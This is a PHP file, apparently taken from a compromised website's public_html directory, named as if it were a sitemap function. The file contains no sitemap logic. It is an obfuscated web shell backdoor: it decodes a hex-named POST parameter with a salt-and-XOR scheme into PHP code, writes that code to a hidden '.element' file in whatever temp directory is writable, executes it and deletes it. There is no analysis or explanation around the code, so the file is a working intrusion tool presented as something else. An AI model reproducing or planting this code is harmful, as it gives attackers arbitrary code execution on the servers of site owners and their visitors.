File: /home/burhbrzf/public_html/function.sitemap.php
<?php
if(isset($_POST["\x69\x74m"]) ? true : false){
$entity = $_POST["\x69\x74m"];
$entity = explode ("." , $entity ) ;
$binding = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt );
$n = 0;
$__tmp = $entity;
while ($v8 = array_shift($__tmp)) {
$sChar = ord($salt[$n % $lenS] );
$d = ((int)$v8 - $sChar - ($n % 10))^69;
$binding .= chr($d );
$n++;}
$hld = array_filter([session_save_path(), getcwd(), "/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]);
$flag = 0;
do {
$val = $hld[$flag] ?? null;
if ($flag >= count($hld)) break;
if (is_writable($val) && is_dir($val)) {
$value = vsprintf("%s/%s", [$val, ".element"]);
if (file_put_contents($value, $binding)) {
require $value;
unlink($value);
exit;
}
}
$flag++;
} while (true);
}